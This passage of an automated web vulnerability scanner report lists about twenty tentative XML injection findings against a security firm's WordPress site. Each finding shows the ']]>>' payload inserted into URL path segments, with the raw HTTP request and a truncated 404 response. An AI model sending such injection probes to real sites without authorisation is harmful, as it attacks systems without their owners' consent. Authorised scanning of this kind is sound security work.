HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:08:48 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:08:53 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.66. http://www.ligattsecurity.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/wp-polls/polls-css.css HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:28:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:28:33 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.67. http://www.ligattsecurity.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:53:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:53:59 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.68. http://www.ligattsecurity.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:14:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:14:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.69. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/css/prettyPhoto.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/wp-prettyphoto Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:47:16 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:48:08 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.70. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/css/prettyPhoto.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/wp-prettyphoto/css Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:06:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:07:09 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.71. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/css/prettyPhoto.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:26:16 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:26:29 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.72. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/css/prettyPhoto.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:42:07 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:42:25 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.73. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/css/prettyPhoto.css [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:17:51 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:18:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.74. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/wp-prettyphoto Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:02:54 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:03:39 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.75. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/wp-prettyphoto/js/jquery Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:27:10 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:27:28 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.76. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:50:54 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:50:59 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.77. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:15:59 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:16:29 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.78. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/themes/elite-force/js/DD Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:50:03 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:50:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27831 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.79. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes]]>>/elite-force/js/DD Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:11:19 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:11:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27831 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.80. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:38:30 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:38:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27831 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.81. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:04:16 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:04:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27831 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.82. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:27:59 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:29:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27831 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.83. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/themes/elite-force/js Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:51:19 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:51:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.84. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes]]>>/elite-force/js/custom.js HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:16:46 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:16:52 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.85. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
